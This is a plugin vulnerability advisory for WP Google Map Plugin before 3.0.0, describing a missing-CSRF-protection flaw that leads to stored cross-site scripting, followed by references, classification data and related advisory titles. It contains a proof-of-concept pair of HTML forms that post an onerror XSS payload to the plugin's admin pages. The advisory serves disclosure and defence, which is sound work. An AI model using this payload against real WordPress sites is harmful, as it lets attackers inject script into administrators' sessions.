WP Google Map Plugin < 3.0.0 – CSRF to Authenticated Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The lack of CSRF Protection could allow attackers to perform XSS attack against logged in administrators.

Proof of Concept

<form method="POST" action="https://example.com/wp-admin/admin.php?page=wpgmp_add_location" />
<input type="text" name="googlemap_title" value='"><img src=x onerror=alert(1) /> ' />
<input type="submit" />
</form>

<form method="POST" action="https://example.com/wp-admin/admin.php?page=wpgmp_google_wpgmp_create_group_map" />
<input type="text" name="group_map_title" value='"><img src=x onerror=alert(1) /> ' />
<input type="submit" />
</form>

Affects Plugins

wp-google-map-plugin

Fixed in 3.0.0

References

URL

http://cinu.pl/research/wp-plugins/mail_7f44ee1674f69bba54409d00ca562e8d.html

URL

http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

No

WPVDB ID

f2093e0a-8365-435a-b257-64684ad7ddb0

Timeline

Publicly Published

2015-08-20 (about 10 years ago)

Added

2015-11-23 (about 10 years ago)

Last Updated

2020-09-08 (about 5 years ago)

Other

Published

Title

Published

2025-06-05

Title

Global Translator <= 2.0.2 - Cross-Site Request Forgery

Published

2025-02-17

Title

1 Click WordPress Migration Plugin – 100% FREE for a limited time < 2.3 - Cross-Site Request Forgery to Backup Process Cancellation

Published

2025-04-09

Title

FrescoChat Live Chat <= 3.2.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2021-08-23

Title

Comment Link Remove and Other Comment Tools < 2.1.6 - Arbitrary Comment Deletion via CSRF

Published

2022-05-26

Title

underConstruction < 1.20 - Construction Mode Deactivation via CSRF